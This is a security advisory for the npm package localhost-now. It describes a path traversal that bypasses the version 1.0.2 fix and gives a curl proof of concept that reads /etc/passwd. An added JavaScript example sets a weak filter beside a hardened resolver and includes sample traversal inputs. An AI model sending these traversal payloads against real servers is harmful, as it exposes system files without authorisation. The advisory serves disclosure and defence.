Description
Path Traversal in localhost-now
All versions of localhost-now are vulnerable to path traversal. This vulnerability is a bypass of the path traversal fix introduced in version 1.0.2.
Proof of concept:
$ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd"
Recommendation
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
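The `..././` sequence in the proof of concept is the shape that defeats a filter which deletes `../` only once. The following is an added example, not localhost-now's code: `stripOnce`, `resolveWeak`, `resolveSafe` and the `/srv/site` root are hypothetical names, and the one-pass filter is an assumption about the kind of fix being bypassed, shown beside a resolve-then-check handler that refuses anything outside the document root.

```javascript
// Added illustration; not localhost-now's source code.
const path = require('path').posix; // POSIX rules so results match on any host

const ROOT = '/srv/site'; // constructed document root

// Assumed weak filter: deletes "../" in ONE pass, so "..././" collapses to "../".
function stripOnce(urlPath) {
  return urlPath.replace(/\.\.\//g, '');
}

// Weak resolver: filter the string, then join with no containment check.
function resolveWeak(urlPath) {
  return path.join(ROOT, stripOnce(urlPath));
}

// Hardened resolver: never rewrite the string; decode, resolve, then require
// the final path to stay under ROOT. Returns null when the request must be refused.
function resolveSafe(urlPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(urlPath);
  } catch (err) {
    return null; // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null; // NUL bytes never belong in a path
  const target = path.resolve(ROOT, './' + decoded);
  const inside = target === ROOT || target.startsWith(ROOT + '/');
  return inside ? target : null;
}

// Constructed request paths: the advisory's payload shape (shortened), a plain
// traversal, a percent-encoded traversal, and a normal request.
const samples = [
  '/..././..././etc/passwd',
  '/../../etc/passwd',
  '/%2e%2e/%2e%2e/etc/passwd',
  '/index.html',
];
for (const p of samples) {
  console.log(p, '| weak:', resolveWeak(p), '| safe:', resolveSafe(p));
}
```

With the hardened resolver the `..././` payload is treated as a literal directory named `...` inside the root, so it can only produce a not-found response.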
Packages
Name: localhost-now (npm)
Affected versions: <= 1.0.2
Fixed version: None
Weaknesses
CWE-22